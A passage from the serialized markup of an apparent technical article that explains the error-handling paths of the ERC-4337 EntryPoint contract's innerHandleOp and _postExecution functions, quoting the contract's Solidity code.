_postExecution",{"type":25,"tag":216,"props":109392,"children":109393},{"style":6964},[109394],{"type":31,"value":7420},{"type":25,"tag":216,"props":109396,"children":109397},{"class":6922,"line":27691},[109398],{"type":25,"tag":216,"props":109399,"children":109400},{"style":6964},[109401],{"type":31,"value":109402},"                    IPaymaster.PostOpMode.postOpReverted,\n",{"type":25,"tag":216,"props":109404,"children":109405},{"class":6922,"line":27724},[109406],{"type":25,"tag":216,"props":109407,"children":109408},{"style":6964},[109409],{"type":31,"value":109410},"                    opInfo,\n",{"type":25,"tag":216,"props":109412,"children":109413},{"class":6922,"line":27732},[109414],{"type":25,"tag":216,"props":109415,"children":109416},{"style":6964},[109417],{"type":31,"value":109418},"                    context,\n",{"type":25,"tag":216,"props":109420,"children":109421},{"class":6922,"line":27740},[109422],{"type":25,"tag":216,"props":109423,"children":109424},{"style":6964},[109425],{"type":31,"value":109426},"                    actualGas\n",{"type":25,"tag":216,"props":109428,"children":109429},{"class":6922,"line":27777},[109430],{"type":25,"tag":216,"props":109431,"children":109432},{"style":6964},[109433],{"type":31,"value":109434},"                );\n",{"type":25,"tag":216,"props":109436,"children":109437},{"class":6922,"line":27790},[109438],{"type":25,"tag":216,"props":109439,"children":109440},{"style":6964},[109441],{"type":31,"value":62852},{"type":25,"tag":216,"props":109443,"children":109444},{"class":6922,"line":27803},[109445],{"type":25,"tag":216,"props":109446,"children":109447},{"style":6964},[109448],{"type":31,"value":7302},{"type":25,"tag":216,"props":109450,"children":109451},{"class":6922,"line":27816},[109452],{"type":25,"tag":216,"props":109453,"children":109454},{"style":6964},[109455],{"type":31,"value":7311},{"type":25,"tag":38,"props":109457,"children":109458},{},[109459,109461,109466,109468,109474,109476,109482,109484,109490],{"type":31,"value":109460},"During execution, the ",{"type":25,"tag":82,"props":109462,"children":109464},{"className":109463},[],[109465],{"type":31,"value":106221},{"type":31,"value":109467}," contract makes a ",{"type":25,"tag":162,"props":109469,"children":109472},{"href":109470,"rel":109471},"https://github.com/eth-infinitism/account-abstraction/blob/releases/v0.8/contracts/core/EntryPoint.sol#L222-L232",[166],[109473],{"type":31,"value":42259},{"type":31,"value":109475}," to its own ",{"type":25,"tag":82,"props":109477,"children":109479},{"className":109478},[],[109480],{"type":31,"value":109481},"innerHandleOp",{"type":31,"value":109483}," function through a low-level ",{"type":25,"tag":82,"props":109485,"children":109487},{"className":109486},[],[109488],{"type":31,"value":109489},"call()",{"type":31,"value":109491},". This is done to create a new call context for executing the user operation.",{"type":25,"tag":38,"props":109493,"children":109494},{},[109495,109497,109503,109504,109509,109511,109518,109520,109526],{"type":31,"value":109496},"If this call fails (when ",{"type":25,"tag":82,"props":109498,"children":109500},{"className":109499},[],[109501],{"type":31,"value":109502},"success",{"type":31,"value":1680},{"type":25,"tag":82,"props":109505,"children":109507},{"className":109506},[],[109508],{"type":31,"value":12127},{"type":31,"value":109510},"), the code enters an ",{"type":25,"tag":162,"props":109512,"children":109515},{"href":109513,"rel":109514},"https://github.com/eth-infinitism/account-abstraction/blob/releases/v0.8/contracts/core/EntryPoint.sol#L235-L273",[166],[109516],{"type":31,"value":109517},"error handling",{"type":31,"value":109519}," flow that checks the ",{"type":25,"tag":82,"props":109521,"children":109523},{"className":109522},[],[109524],{"type":31,"value":109525},"innerRevertCode",{"type":31,"value":109527},". There are three possible paths:",{"type":25,"tag":6711,"props":109529,"children":109530},{},[109531,109555,109573],{"type":25,"tag":2043,"props":109532,"children":109533},{},[109534,109535,109540,109541,109547,109549,109554],{"type":31,"value":11431},{"type":25,"tag":82,"props":109536,"children":109538},{"className":109537},[],[109539],{"type":31,"value":109525},{"type":31,"value":1680},{"type":25,"tag":82,"props":109542,"children":109544},{"className":109543},[],[109545],{"type":31,"value":109546},"INNER_OUT_OF_GAS",{"type":31,"value":109548},", it means the bundler didn't provide enough gas for execution. This causes the entire bundle to fail with ",{"type":25,"tag":82,"props":109550,"children":109552},{"className":109551},[],[109553],{"type":31,"value":109198},{"type":31,"value":179},{"type":25,"tag":2043,"props":109556,"children":109557},{},[109558,109559,109564,109565,109571],{"type":31,"value":11431},{"type":25,"tag":82,"props":109560,"children":109562},{"className":109561},[],[109563],{"type":31,"value":109525},{"type":31,"value":1680},{"type":25,"tag":82,"props":109566,"children":109568},{"className":109567},[],[109569],{"type":31,"value":109570},"INNER_REVERT_LOW_PREFUND",{"type":31,"value":109572},", it means the user didn't prefund enough gas. In this case, it charges the entire prefund amount as gas cost.",{"type":25,"tag":2043,"props":109574,"children":109575},{},[109576,109578,109584,109586,109592],{"type":31,"value":109577},"For any other revert reason, the code will still call ",{"type":25,"tag":82,"props":109579,"children":109581},{"className":109580},[],[109582],{"type":31,"value":109583},"_postExecution()",{"type":31,"value":109585}," but with ",{"type":25,"tag":82,"props":109587,"children":109589},{"className":109588},[],[109590],{"type":31,"value":109591},"PostOpMode.postOpReverted",{"type":31,"value":109593},". This ensures proper cleanup happens even on failure.",{"type":25,"tag":38,"props":109595,"children":109596},{},[109597,109599,109604,109606,109611,109613,109618,109620,109625],{"type":31,"value":109598},"We're particularly interested in the third error path, where ",{"type":25,"tag":82,"props":109600,"children":109602},{"className":109601},[],[109603],{"type":31,"value":109525},{"type":31,"value":109605}," is neither ",{"type":25,"tag":82,"props":109607,"children":109609},{"className":109608},[],[109610],{"type":31,"value":109546},{"type":31,"value":109612}," nor ",{"type":25,"tag":82,"props":109614,"children":109616},{"className":109615},[],[109617],{"type":31,"value":109570},{"type":31,"value":109619},". To understand this case better, let's examine how ",{"type":25,"tag":82,"props":109621,"children":109623},{"className":109622},[],[109624],{"type":31,"value":109481},{"type":31,"value":109626}," works.",{"type":25,"tag":206,"props":109628,"children":109630},{"className":8423,"code":109629,"language":8422,"meta":7,"style":7},"    function innerHandleOp(\n        bytes memory callData,\n        UserOpInfo memory opInfo,\n        bytes calldata context\n    ) external returns (uint256 actualGasCost) {\n    [...]\n        IPaymaster.PostOpMode mode = IPaymaster.PostOpMode.opSucceeded;\n        if (callData.length > 0) {\n            bool success = Exec.call(mUserOp.sender, 0, callData, callGasLimit);\n            if (!success) {\n                uint256 freePtr = _getFreePtr();\n                bytes memory result = Exec.getReturnData(REVERT_REASON_MAX_LEN);\n                if (result.length > 0) {\n                    emit UserOperationRevertReason(\n                        opInfo.userOpHash,\n                        mUserOp.sender,\n                        mUserOp.nonce,\n                        result\n                    );\n                }\n                _restoreFreePtr(freePtr);\n                mode = IPaymaster.PostOpMode.opReverted;\n            }\n        }\n\n        unchecked {\n            uint256 actualGas = preGas - gasleft() + opInfo.preOpGas;\n            return _postExecution(mode, opInfo, context, actualGas);\n        }\n    }\n",[109631],{"type":25,"tag":82,"props":109632,"children":109633},{"__ignoreMap":7},[109634,109650,109671,109691,109707,109740,109747,109764,109788,109828,109847,109872,109906,109930,109947,109955,109963,109971,109979,109987,109994,110007,110024,110031,110038,110045,110056,110095,110111,110118],{"type":25,"tag":216,"props":109635,"children":109636},{"class":6922,"line":6923},[109637,109641,109646],{"type":25,"tag":216,"props":109638,"children":109639},{"style":6936},[109640],{"type":31,"value":93802},{"type":25,"tag":216,"props":109642,"children":109643},{"style":7047},[109644],{"type":31,"value":109645}," innerHandleOp",{"type":25,"tag":216,"props":109647,"children":109648},{"style":6964},[109649],{"type":31,"value":7420},{"type":25,"tag":216,"props":109651,"children":109652},{"class":6922,"line":6769},[109653,109658,109662,109667],{"type":25,"tag":216,"props":109654,"children":109655},{"style":7375},[109656],{"type":31,"value":109657},"        bytes",{"type":25,"tag":216,"props":109659,"children":109660},{"style":6936},[109661],{"type":31,"value":107038},{"type":25,"tag":216,"props":109663,"children":109664},{"style":6947},[109665],{"type":31,"value":109666}," callData",{"type":25,"tag":216,"props":109668,"children":109669},{"style":6964},[109670],{"type":31,"value":7465},{"type":25,"tag":216,"props":109672,"children":109673},{"class":6922,"line":6778},[109674,109678,109682,109687],{"type":25,"tag":216,"props":109675,"children":109676},{"style":6936},[109677],{"type":31,"value":108698},{"type":25,"tag":216,"props":109679,"children":109680},{"style":6936},[109681],{"type":31,"value":107038},{"type":25,"tag":216,"props":109683,"children":109684},{"style":6947},[109685],{"type":31,"value":109686}," opInfo",{"type":25,"tag":216,"props":109688,"children":109689},{"style":6964},[109690],{"type":31,"value":7465},{"type":25,"tag":216,"props":109692,"children":109693},{"class":6922,"line":7005},[109694,109698,109702],{"type":25,"tag":216,"props":109695,"children":109696},{"style":7375},[109697],{"type":31,"value":109657},{"type":25,"tag":216,"props":109699,"children":109700},{"style":6936},[109701],{"type":31,"value":106970},{"type":25,"tag":216,"props":109703,"children":109704},{"style":6947},[109705],{"type":31,"value":109706}," context\n",{"type":25,"tag":216,"props":109708,"children":109709},{"class":6922,"line":7110},[109710,109715,109720,109724,109728,109732,109736],{"type":25,"tag":216,"props":109711,"children":109712},{"style":6964},[109713],{"type":31,"value":109714},"    ) ",{"type":25,"tag":216,"props":109716,"children":109717},{"style":6936},[109718],{"type":31,"value":109719},"external",{"type":25,"tag":216,"props":109721,"children":109722},{"style":6973},[109723],{"type":31,"value":79965},{"type":25,"tag":216,"props":109725,"children":109726},{"style":6964},[109727],{"type":31,"value":7016},{"type":25,"tag":216,"props":109729,"children":109730},{"style":7375},[109731],{"type":31,"value":50136},{"type":25,"tag":216,"props":109733,"children":109734},{"style":6947},[109735],{"type":31,"value":107779},{"type":25,"tag":216,"props":109737,"children":109738},{"style":6964},[109739],{"type":31,"value":18761},{"type":25,"tag":216,"props":109741,"children":109742},{"class":6922,"line":7216},[109743],{"type":25,"tag":216,"props":109744,"children":109745},{"style":6964},[109746],{"type":31,"value":108759},{"type":25,"tag":216,"props":109748,"children":109749},{"class":6922,"line":7244},[109750,109755,109759],{"type":25,"tag":216,"props":109751,"children":109752},{"style":6964},[109753],{"type":31,"value":109754},"        IPaymaster.PostOpMode mode ",{"type":25,"tag":216,"props":109756,"children":109757},{"style":6953},[109758],{"type":31,"value":266},{"type":25,"tag":216,"props":109760,"children":109761},{"style":6964},[109762],{"type":31,"value":109763}," IPaymaster.PostOpMode.opSucceeded;\n",{"type":25,"tag":216,"props":109765,"children":109766},{"class":6922,"line":7257},[109767,109771,109776,109780,109784],{"type":25,"tag":216,"props":109768,"children":109769},{"style":6973},[109770],{"type":31,"value":7222},{"type":25,"tag":216,"props":109772,"children":109773},{"style":6964},[109774],{"type":31,"value":109775}," (callData.length ",{"type":25,"tag":216,"props":109777,"children":109778},{"style":6953},[109779],{"type":31,"value":5902},{"type":25,"tag":216,"props":109781,"children":109782},{"style":6989},[109783],{"type":31,"value":6992},{"type":25,"tag":216,"props":109785,"children":109786},{"style":6964},[109787],{"type":31,"value":18761},{"type":25,"tag":216,"props":109789,"children":109790},{"class":6922,"line":7275},[109791,109796,109801,109805,109810,109814,109819,109823],{"type":25,"tag":216,"props":109792,"children":109793},{"style":7375},[109794],{"type":31,"value":109795},"            bool",{"type":25,"tag":216,"props":109797,"children":109798},{"style":6964},[109799],{"type":31,"value":109800}," success ",{"type":25,"tag":216,"props":109802,"children":109803},{"style":6953},[109804],{"type":31,"value":266},{"type":25,"tag":216,"props":109806,"children":109807},{"style":6964},[109808],{"type":31,"value":109809}," Exec.",{"type":25,"tag":216,"props":109811,"children":109812},{"style":7047},[109813],{"type":31,"value":42259},{"type":25,"tag":216,"props":109815,"children":109816},{"style":6964},[109817],{"type":31,"value":109818},"(mUserOp.sender, ",{"type":25,"tag":216,"props":109820,"children":109821},{"style":6989},[109822],{"type":31,"value":1882},{"type":25,"tag":216,"props":109824,"children":109825},{"style":6964},[109826],{"type":31,"value":109827},", callData, callGasLimit);\n",{"type":25,"tag":216,"props":109829,"children":109830},{"class":6922,"line":7296},[109831,109835,109839,109843],{"type":25,"tag":216,"props":109832,"children":109833},{"style":6973},[109834],{"type":31,"value":62768},{"type":25,"tag":216,"props":109836,"children":109837},{"style":6964},[109838],{"type":31,"value":7016},{"type":25,"tag":216,"props":109840,"children":109841},{"style":6953},[109842],{"type":31,"value":24581},{"type":25,"tag":216,"props":109844,"children":109845},{"style":6964},[109846],{"type":31,"value":109131},{"type":25,"tag":216,"props":109848,"children":109849},{"class":6922,"line":7305},[109850,109854,109859,109863,109868],{"type":25,"tag":216,"props":109851,"children":109852},{"style":7375},[109853],{"type":31,"value":107418},{"type":25,"tag":216,"props":109855,"children":109856},{"style":6964},[109857],{"type":31,"value":109858}," freePtr ",{"type":25,"tag":216,"props":109860,"children":109861},{"style":6953},[109862],{"type":31,"value":266},{"type":25,"tag":216,"props":109864,"children":109865},{"style":7047},[109866],{"type":31,"value":109867}," _getFreePtr",{"type":25,"tag":216,"props":109869,"children":109870},{"style":6964},[109871],{"type":31,"value":7633},{"type":25,"tag":216,"props":109873,"children":109874},{"class":6922,"line":7557},[109875,109879,109883,109888,109892,109896,109901],{"type":25,"tag":216,"props":109876,"children":109877},{"style":7375},[109878],{"type":31,"value":108815},{"type":25,"tag":216,"props":109880,"children":109881},{"style":6936},[109882],{"type":31,"value":107038},{"type":25,"tag":216,"props":109884,"children":109885},{"style":6964},[109886],{"type":31,"value":109887}," result ",{"type":25,"tag":216,"props":109889,"children":109890},{"style":6953},[109891],{"type":31,"value":266},{"type":25,"tag":216,"props":109893,"children":109894},{"style":6964},[109895],{"type":31,"value":109809},{"type":25,"tag":216,"props":109897,"children":109898},{"style":7047},[109899],{"type":31,"value":109900},"getReturnData",{"type":25,"tag":216,"props":109902,"children":109903},{"style":6964},[109904],{"type":31,"value":109905},"(REVERT_REASON_MAX_LEN);\n",{"type":25,"tag":216,"props":109907,"children":109908},{"class":6922,"line":7574},[109909,109913,109918,109922,109926],{"type":25,"tag":216,"props":109910,"children":109911},{"style":6973},[109912],{"type":31,"value":107478},{"type":25,"tag":216,"props":109914,"children":109915},{"style":6964},[109916],{"type":31,"value":109917}," (result.length ",{"type":25,"tag":216,"props":109919,"children":109920},{"style":6953},[109921],{"type":31,"value":5902},{"type":25,"tag":216,"props":109923,"children":109924},{"style":6989},[109925],{"type":31,"value":6992},{"type":25,"tag":216,"props":109927,"children":109928},{"style":6964},[109929],{"type":31,"value":18761},{"type":25,"tag":216,"props":109931,"children":109932},{"class":6922,"line":7591},[109933,109938,109943],{"type":25,"tag":216,"props":109934,"children":109935},{"style":6973},[109936],{"type":31,"value":109937},"                    emit",{"type":25,"tag":216,"props":109939,"children":109940},{"style":7047},[109941],{"type":31,"value":109942}," UserOperationRevertReason",{"type":25,"tag":216,"props":109944,"children":109945},{"style":6964},[109946],{"type":31,"value":7420},{"type":25,"tag":216,"props":109948,"children":109949},{"class":6922,"line":7604},[109950],{"type":25,"tag":216,"props":109951,"children":109952},{"style":6964},[109953],{"type":31,"value":109954},"                        opInfo.userOpHash,\n",{"type":25,"tag":216,"props":109956,"children":109957},{"class":6922,"line":7613},[109958],{"type":25,"tag":216,"props":109959,"children":109960},{"style":6964},[109961],{"type":31,"value":109962},"                        mUserOp.sender,\n",{"type":25,"tag":216,"props":109964,"children":109965},{"class":6922,"line":7636},[109966],{"type":25,"tag":216,"props":109967,"children":109968},{"style":6964},[109969],{"type":31,"value":109970},"                        mUserOp.nonce,\n",{"type":25,"tag":216,"props":109972,"children":109973},{"class":6922,"line":7645},[109974],{"type":25,"tag":216,"props":109975,"children":109976},{"style":6964},[109977],{"type":31,"value":109978},"                        result\n",{"type":25,"tag":216,"props":109980,"children":109981},{"class":6922,"line":7654},[109982],{"type":25,"tag":216,"props":109983,"children":109984},{"style":6964},[109985],{"type":31,"value":109986},"                    );\n",{"type":25,"tag":216,"props":109988,"children":109989},{"class":6922,"line":7722},[109990],{"type":25,"tag":216,"props":109991,"children":109992},{"style":6964},[109993],{"type":31,"value":75041},{"type":25,"tag":216,"props":109995,"children":109996},{"class":6922,"line":7730},[109997,110002],{"type":25,"tag":216,"props":109998,"children":109999},{"style":7047},[110000],{"type":31,"value":110001},"                _restoreFreePtr",{"type":25,"tag":216,"props":110003,"children":110004},{"style":6964},[110005],{"type":31,"value":110006},"(freePtr);\n",{"type":25,"tag":216,"props":110008,"children":110009},{"class":6922,"line":7760},[110010,110015,110019],{"type":25,"tag":216,"props":110011,"children":110012},{"style":6964},[110013],{"type":31,"value":110014},"                mode ",{"type":25,"tag":216,"props":110016,"children":110017},{"style":6953},[110018],{"type":31,"value":266},{"type":25,"tag":216,"props":110020,"children":110021},{"style":6964},[110022],{"type":31,"value":110023}," IPaymaster.PostOpMode.opReverted;\n",{"type":25,"tag":216,"props":110025,"children":110026},{"class":6922,"line":7768},[110027],{"type":25,"tag":216,"props":110028,"children":110029},{"style":6964},[110030],{"type":31,"value":62852},{"type":25,"tag":216,"props":110032,"children":110033},{"class":6922,"line":7800},[110034],{"type":25,"tag":216,"props":110035,"children":110036},{"style":6964},[110037],{"type":31,"value":7302},{"type":25,"tag":216,"props":110039,"children":110040},{"class":6922,"line":7808},[110041],{"type":25,"tag":216,"props":110042,"children":110043},{"emptyLinePlaceholder":16},[110044],{"type":31,"value":7642},{"type":25,"tag":216,"props":110046,"children":110047},{"class":6922,"line":7868},[110048,110052],{"type":25,"tag":216,"props":110049,"children":110050},{"style":6973},[110051],{"type":31,"value":107074},{"type":25,"tag":216,"props":110053,"children":110054},{"style":6964},[110055],{"type":31,"value":7241},{"type":25,"tag":216,"props":110057,"children":110058},{"class":6922,"line":13001},[110059,110063,110067,110071,110075,110079,110083,110087,110091],{"type":25,"tag":216,"props":110060,"children":110061},{"style":7375},[110062],{"type":31,"value":107086},{"type":25,"tag":216,"props":110064,"children":110065},{"style":6964},[110066],{"type":31,"value":109250},{"type":25,"tag":216,"props":110068,"children":110069},{"style":6953},[110070],{"type":31,"value":266},{"type":25,"tag":216,"props":110072,"children":110073},{"style":6964},[110074],{"type":31,"value":109259},{"type":25,"tag":216,"props":110076,"children":110077},{"style":6953},[110078],{"type":31,"value":8276},{"type":25,"tag":216,"props":110080,"children":110081},{"style":6936},[110082],{"type":31,"value":109268},{"type":25,"tag":216,"props":110084,"children":110085},{"style":6964},[110086],{"type":31,"value":18000},{"type":25,"tag":216,"props":110088,"children":110089},{"style":6953},[110090],{"type":31,"value":3539},{"type":25,"tag":216,"props":110092,"children":110093},{"style":6964},[110094],{"type":31,"value":109281},{"type":25,"tag":216,"props":110096,"children":110097},{"class":6922,"line":13019},[110098,110102,110106],{"type":25,"tag":216,"props":110099,"children":110100},{"style":6973},[110101],{"type":31,"value":83048},{"type":25,"tag":216,"props":110103,"children":110104},{"style":7047},[110105],{"type":31,"value":109390},{"type":25,"tag":216,"props":110107,"children":110108},{"style":6964},[110109],{"type":31,"value":110110},"(mode, opInfo, context, actualGas);\n",{"type":25,"tag":216,"props":110112,"children":110113},{"class":6922,"line":13064},[110114],{"type":25,"tag":216,"props":110115,"children":110116},{"style":6964},[110117],{"type":31,"value":7302},{"type":25,"tag":216,"props":110119,"children":110120},{"class":6922,"line":13170},[110121],{"type":25,"tag":216,"props":110122,"children":110123},{"style":6964},[110124],{"type":31,"value":7311},{"type":25,"tag":38,"props":110126,"children":110127},{},[110128,110130,110135,110137,110142,110144,110150,110152,110158,110160,110165,110167,110177],{"type":31,"value":110129},"We observe that, in the happy path, ",{"type":25,"tag":82,"props":110131,"children":110133},{"className":110132},[],[110134],{"type":31,"value":109481},{"type":31,"value":110136}," is expected to not only execute the actual ",{"type":25,"tag":82,"props":110138,"children":110140},{"className":110139},[],[110141],{"type":31,"value":106140},{"type":31,"value":110143}," call, but also call ",{"type":25,"tag":82,"props":110145,"children":110147},{"className":110146},[],[110148],{"type":31,"value":110149},"_postExecution",{"type":31,"value":110151},". This means that the third failure handling path, which passes ",{"type":25,"tag":82,"props":110153,"children":110155},{"className":110154},[],[110156],{"type":31,"value":110157},"postOpReverted",{"type":31,"value":110159}," as its mode, happens when something goes wrong with the ",{"type":25,"tag":82,"props":110161,"children":110163},{"className":110162},[],[110164],{"type":31,"value":110149},{"type":31,"value":110166}," call ",{"type":25,"tag":9273,"props":110168,"children":110169},{},[110170,110172],{"type":31,"value":110171},"inside ",{"type":25,"tag":82,"props":110173,"children":110175},{"className":110174},[],[110176],{"type":31,"value":109481},{"type":31,"value":179},{"type":25,"tag":38,"props":110179,"children":110180},{},[110181,110183,110188],{"type":31,"value":110182},"Let's examine the ",{"type":25,"tag":82,"props":110184,"children":110186},{"className":110185},[],[110187],{"type":31,"value":110149},{"type":31,"value":110189}," code to understand where the revert might occur.",{"type":25,"tag":206,"props":110191,"children":110193},{"className":8423,"code":110192,"language":8422,"meta":7,"style":7},"    function _postExecution(\n        IPaymaster.PostOpMode mode,\n        UserOpInfo memory opInfo,\n        bytes memory context,\n        uint256 actualGas\n    ) internal virtual returns (uint256 actualGasCost) {\n    [...]\n            if (paymaster == address(0)) {\n                refundAddress = mUserOp.sender;\n            } else {\n                refundAddress = paymaster;\n                if (context.length > 0) {\n                    actualGasCost = actualGas * gasPrice;\n                    uint256 postOpPreGas = gasleft();\n                    if (mode != IPaymaster.PostOpMode.postOpReverted) {\n                        try IPaymaster(paymaster).postOp{\n                                gas: mUserOp.paymasterPostOpGasLimit\n                            }(mode, context, actualGasCost, gasPrice)\n                        // solhint-disable-next-line no-empty-blocks\n                        {} catch {\n                            bytes memory reason = Exec.getReturnData(REVERT_REASON_MAX_LEN);\n                            revert PostOpReverted(reason);\n                        }\n                    }\n                    // Calculating a penalty for unused postOp gas\n                    // note that if postOp is reverted, the maximum penalty (10% of postOpGasLimit) is charged.\n                    uint256 postOpGasUsed = postOpPreGas - gasleft();\n                    postOpUnusedGasPenalty = _getUnusedGasPenalty(postOpGasUsed, mUserOp.paymasterPostOpGasLimit);\n                }\n            }\n    [...]\n    }\n",[110194],{"type":25,"tag":82,"props":110195,"children":110196},{"__ignoreMap":7},[110197,110212,110237,110256,110275,110287,110324,110331,110363,110380,110395,110411,110435,110460,110484,110506,110524,110541,110549,110567,110583,110616,110634,110641,110648,110656,110672,110704,110726,110733,110740,110747],{"type":25,"tag":216,"props":110198,"children":110199},{"class":6922,"line":6923},[110200,110204,110208],{"type":25,"tag":216,"props":110201,"children":110202},{"style":6936},[110203],{"type":31,"value":93802},{"type":25,"tag":216,"props":110205,"children":110206},{"style":7047},[110207],{"type":31,"value":109390},{"type":25,"tag":216,"props":110209,"children":110210},{"style":6964},[110211],{"type":31,"value":7420},{"type":25,"tag":216,"props":110213,"children":110214},{"class":6922,"line":6769},[110215,110220,110224,110228,110233],{"type":25,"tag":216,"props":110216,"children":110217},{"style":6936},[110218],{"type":31,"value":110219},"        IPaymaster",{"type":25,"tag":216,"props":110221,"children":110222},{"style":6964},[110223],{"type":31,"value":179},{"type":25,"tag":216,"props":110225,"children":110226},{"style":6947},[110227],{"type":31,"value":107750},{"type":25,"tag":216,"props":110229,"children":110230},{"style":6947},[110231],{"type":31,"value":110232}," mode",{"type":25,"tag":216,"props":110234,"children":110235},{"style":6964},[110236],{"type":31,"value":7465},{"type":25,"tag":216,"props":110238,"children":110239},{"class":6922,"line":6778},[110240,110244,110248,110252],{"type":25,"tag":216,"props":110241,"children":110242},{"style":6936},[110243],{"type":31,"value":108698},{"type":25,"tag":216,"props":110245,"children":110246},{"style":6936},[110247],{"type":31,"value":107038},{"type":25,"tag":216,"props":110249,"children":110250},{"style":6947},[110251],{"type":31,"value":109686},{"type":25,"tag":216,"props":110253,"children":110254},{"style":6964},[110255],{"type":31,"value":7465},{"type":25,"tag":216,"props":110257,"children":110258},{"class":6922,"line":7005},[110259,110263,110267,110271],{"type":25,"tag":216,"props":110260,"children":110261},{"style":7375},[110262],{"type":31,"value":109657},{"type":25,"tag":216,"props":110264,"children":110265},{"style":6936},[110266],{"type":31,"value":107038},{"type":25,"tag":216,"props":110268,"children":110269},{"style":6947},[110270],{"type":31,"value":80312},{"type":25,"tag":216,"props":110272,"children":110273},{"style":6964},[110274],{"type":31,"value":7465},{"type":25,"tag":216,"props":110276,"children":110277},{"class":6922,"line":7110},[110278,110282],{"type":25,"tag":216,"props":110279,"children":110280},{"style":7375},[110281],{"type":31,"value":93980},{"type":25,"tag":216,"props":110283,"children":110284},{"style":6947},[110285],{"type":31,"value":110286}," actualGas\n",{"type":25,"tag":216,"props":110288,"children":110289},{"class":6922,"line":7216},[110290,110294,110299,110304,110308,110312,110316,110320],{"type":25,"tag":216,"props":110291,"children":110292},{"style":6964},[110293],{"type":31,"value":109714},{"type":25,"tag":216,"props":110295,"children":110296},{"style":6936},[110297],{"type":31,"value":110298},"internal",{"type":25,"tag":216,"props":110300,"children":110301},{"style":6936},[110302],{"type":31,"value":110303}," virtual",{"type":25,"tag":216,"props":110305,"children":110306},{"style":6973},[110307],{"type":31,"value":79965},{"type":25,"tag":216,"props":110309,"children":110310},{"style":6964},[110311],{"type":31,"value":7016},{"type":25,"tag":216,"props":110313,"children":110314},{"style":7375},[110315],{"type":31,"value":50136},{"type":25,"tag":216,"props":110317,"children":110318},{"style":6947},[110319],{"type":31,"value":107779},{"type":25,"tag":216,"props":110321,"children":110322},{"style":6964},[110323],{"type":31,"value":18761},{"type":25,"tag":216,"props":110325,"children":110326},{"class":6922,"line":7244},[110327],{"type":25,"tag":216,"props":110328,"children":110329},{"style":6964},[110330],{"type":31,"value":108759},{"type":25,"tag":216,"props":110332,"children":110333},{"class":6922,"line":7257},[110334,110338,110343,110347,110351,110355,110359],{"type":25,"tag":216,"props":110335,"children":110336},{"style":6973},[110337],{"type":31,"value":62768},{"type":25,"tag":216,"props":110339,"children":110340},{"style":6964},[110341],{"type":31,"value":110342}," (paymaster ",{"type":25,"tag":216,"props":110344,"children":110345},{"style":6953},[110346],{"type":31,"value":12528},{"type":25,"tag":216,"props":110348,"children":110349},{"style":7375},[110350],{"type":31,"value":10201},{"type":25,"tag":216,"props":110352,"children":110353},{"style":6964},[110354],{"type":31,"value":1850},{"type":25,"tag":216,"props":110356,"children":110357},{"style":6989},[110358],{"type":31,"value":1882},{"type":25,"tag":216,"props":110360,"children":110361},{"style":6964},[110362],{"type":31,"value":39157},{"type":25,"tag":216,"props":110364,"children":110365},{"class":6922,"line":7275},[110366,110371,110375],{"type":25,"tag":216,"props":110367,"children":110368},{"style":6964},[110369],{"type":31,"value":110370},"                refundAddress ",{"type":25,"tag":216,"props":110372,"children":110373},{"style":6953},[110374],{"type":31,"value":266},{"type":25,"tag":216,"props":110376,"children":110377},{"style":6964},[110378],{"type":31,"value":110379}," mUserOp.sender;\n",{"type":25,"tag":216,"props":110381,"children":110382},{"class":6922,"line":7296},[110383,110387,110391],{"type":25,"tag":216,"props":110384,"children":110385},{"style":6964},[110386],{"type":31,"value":74564},{"type":25,"tag":216,"props":110388,"children":110389},{"style":6973},[110390],{"type":31,"value":7268},{"type":25,"tag":216,"props":110392,"children":110393},{"style":6964},[110394],{"type":31,"value":7241},{"type":25,"tag":216,"props":110396,"children":110397},{"class":6922,"line":7305},[110398,110402,110406],{"type":25,"tag":216,"props":110399,"children":110400},{"style":6964},[110401],{"type":31,"value":110370},{"type":25,"tag":216,"props":110403,"children":110404},{"style":6953},[110405],{"type":31,"value":266},{"type":25,"tag":216,"props":110407,"children":110408},{"style":6964},[110409],{"type":31,"value":110410}," paymaster;\n",{"type":25,"tag":216,"props":110412,"children":110413},{"class":6922,"line":7557},[110414,110418,110423,110427,110431],{"type":25,"tag":216,"props":110415,"children":110416},{"style":6973},[110417],{"type":31,"value":107478},{"type":25,"tag":216,"props":110419,"children":110420},{"style":6964},[110421],{"type":31,"value":110422}," (context.length ",{"type":25,"tag":216,"props":110424,"children":110425},{"style":6953},[110426],{"type":31,"value":5902},{"type":25,"tag":216,"props":110428,"children":110429},{"style":6989},[110430],{"type":31,"value":6992},{"type":25,"tag":216,"props":110432,"children":110433},{"style":6964},[110434],{"type":31,"value":18761},{"type":25,"tag":216,"props":110436,"children":110437},{"class":6922,"line":7574},[110438,110443,110447,110451,110455],{"type":25,"tag":216,"props":110439,"children":110440},{"style":6964},[110441],{"type":31,"value":110442},"                    actualGasCost ",{"type":25,"tag":216,"props":110444,"children":110445},{"style":6953},[110446],{"type":31,"value":266},{"type":25,"tag":216,"props":110448,"children":110449},{"style":6964},[110450],{"type":31,"value":109250},{"type":25,"tag":216,"props":110452,"children":110453},{"style":6953},[110454],{"type":31,"value":8519},{"type":25,"tag":216,"props":110456,"children":110457},{"style":6964},[110458],{"type":31,"value":110459}," gasPrice;\n",{"type":25,"tag":216,"props":110461,"children":110462},{"class":6922,"line":7591},[110463,110467,110472,110476,110480],{"type":25,"tag":216,"props":110464,"children":110465},{"style":7375},[110466],{"type":31,"value":107435},{"type":25,"tag":216,"props":110468,"children":110469},{"style":6964},[110470],{"type":31,"value":110471}," postOpPreGas ",{"type":25,"tag":216,"props":110473,"children":110474},{"style":6953},[110475],{"type":31,"value":266},{"type":25,"tag":216,"props":110477,"children":110478},{"style":6936},[110479],{"type":31,"value":109268},{"type":25,"tag":216,"props":110481,"children":110482},{"style":6964},[110483],{"type":31,"value":7633},{"type":25,"tag":216,"props":110485,"children":110486},{"class":6922,"line":7604},[110487,110492,110497,110501],{"type":25,"tag":216,"props":110488,"children":110489},{"style":6973},[110490],{"type":31,"value":110491},"                    if",{"type":25,"tag":216,"props":110493,"children":110494},{"style":6964},[110495],{"type":31,"value":110496}," (mode ",{"type":25,"tag":216,"props":110498,"children":110499},{"style":6953},[110500],{"type":31,"value":19646},{"type":25,"tag":216,"props":110502,"children":110503},{"style":6964},[110504],{"type":31,"value":110505}," IPaymaster.PostOpMode.postOpReverted) {\n",{"type":25,"tag":216,"props":110507,"children":110508},{"class":6922,"line":7613},[110509,110514,110519],{"type":25,"tag":216,"props":110510,"children":110511},{"style":6973},[110512],{"type":31,"value":110513},"                        